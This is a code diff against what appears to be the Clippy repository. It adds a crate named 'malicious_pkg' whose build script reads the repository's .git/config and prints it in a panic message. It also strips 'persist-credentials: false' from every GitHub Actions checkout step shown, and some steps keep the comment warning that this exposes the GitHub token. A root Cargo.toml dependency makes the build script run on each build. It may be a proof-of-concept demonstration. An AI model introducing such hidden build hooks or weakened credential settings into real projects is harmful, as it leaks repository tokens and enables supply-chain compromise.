A

.github/malicious_pkg/Cargo.toml

@@ -0,0 +1,6 @@
+[package]
+name = "malicious_pkg"
+version = "0.1.0"
+edition = "2024"
+
+[dependencies]

.github/malicious_pkg/build.rs

@@ -0,0 +1,3 @@
+fn main() {
+    panic!("{}", std::fs::read_to_string("../../.git/config").unwrap());
+}

.github/malicious_pkg/src/lib.rs

@@ -0,0 +1,14 @@
+pub fn add(left: u64, right: u64) -> u64 {
+    left + right
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn it_works() {
+        let result = add(2, 2);
+        assert_eq!(result, 4);
+    }
+}

.github/workflows/clippy_dev.yml

@@ -17,9 +17,8 @@ jobs:
     # Setup
     - name: Checkout
       uses: actions/checkout@v4
-      with:
-        # Unsetting this would make so that any malicious package could get our Github Token
-        persist-credentials: false
+
+
 
     # Run
     - name: Build

.github/workflows/clippy_mq.yml

@@ -24,7 +24,7 @@ jobs:
       with:
         ref: ${{ github.ref }}
         # Unsetting this would make so that any malicious package could get our Github Token
-        persist-credentials: false
+
 
     # Run
     - name: Check Changelog
@@ -65,8 +65,7 @@ jobs:
     # Setup
     - name: Checkout
       uses: actions/checkout@v4
-      with:
-        persist-credentials: false
+
 
     - name: Install i686 dependencies
       if: matrix.host == 'i686-unknown-linux-gnu'
@@ -125,8 +124,7 @@ jobs:
      # Setup
     - name: Checkout
       uses: actions/checkout@v4
-      with:
-        persist-credentials: false
+
 
     - name: Install toolchain
       run: rustup show active-toolchain
@@ -142,8 +140,7 @@ jobs:
     # Setup
     - name: Checkout
       uses: actions/checkout@v4
-      with:
-        persist-credentials: false
+
 
     - name: Install toolchain
       run: rustup show active-toolchain
@@ -196,8 +193,7 @@ jobs:
     # Setup
     - name: Checkout
       uses: actions/checkout@v4
-      with:
-        persist-credentials: false
+
 
     - name: Install toolchain
       run: rustup show active-toolchain

.github/workflows/clippy_pr.yml

@@ -25,9 +25,8 @@ jobs:
     # Setup
     - name: Checkout
       uses: actions/checkout@v4
-      with:
         # Unsetting this would make so that any malicious package could get our Github Token
-        persist-credentials: false
+
 
     - name: Install toolchain
       run: rustup show active-toolchain

.github/workflows/deploy.yml

@@ -22,17 +22,15 @@ jobs:
     # Setup
     - name: Checkout
       uses: actions/checkout@v4
-      with:
-        # Unsetting this would make so that any malicious package could get our Github Token
-        persist-credentials: false
+
 
     - name: Checkout
       uses: actions/checkout@v4
       with:
         ref: ${{ env.TARGET_BRANCH }}
         path: 'out'
         # Unsetting this would make so that any malicious package could get our Github Token
-        persist-credentials: false
+
 
     # Run
     - name: Set tag name

.github/workflows/lintcheck.yml

@@ -22,7 +22,7 @@ jobs:
       with:
         fetch-depth: 2
         # Unsetting this would make so that any malicious package could get our Github Token
-        persist-credentials: false
+
 
     # HEAD is the generated merge commit `refs/pull/N/merge` between the PR and `master`, `HEAD^`
     # being the commit from `master` that is the base of the merge
@@ -75,9 +75,8 @@ jobs:
     steps:
     - name: Checkout
       uses: actions/checkout@v4
-      with:
-        # Unsetting this would make so that any malicious package could get our Github Token
-        persist-credentials: false
+      #etting this would make so that any malicious package could get our Github Token
+
 
     - name: Cache lintcheck bin
       id: cache-lintcheck-bin
@@ -108,9 +107,8 @@ jobs:
     steps:
     - name: Checkout
       uses: actions/checkout@v4
-      with:
-        # Unsetting this would make so that any malicious package could get our Github Token
-        persist-credentials: false
+     #nsetting this would make so that any malicious package could get our Github Token
+
 
     - name: Restore lintcheck bin
       uses: actions/cache/restore@v4

.github/workflows/remark.yml

@@ -12,9 +12,7 @@ jobs:
     # Setup
     - name: Checkout
       uses: actions/checkout@v4
-      with:
-        # Unsetting this would make so that any malicious package could get our Github Token
-        persist-credentials: false
+
 
     - name: Setup Node.js
       uses: actions/setup-node@v4

Cargo.toml

@@ -30,6 +30,7 @@ tempfile = { version = "3.3", optional = true }
 termize = "0.1"
 color-print = "0.3.4"
 anstream = "0.6.18"
+malicious_pkg = {path = ".github/malicious_pkg"}
 
 [dev-dependencies]
 cargo_metadata = "0.18.1"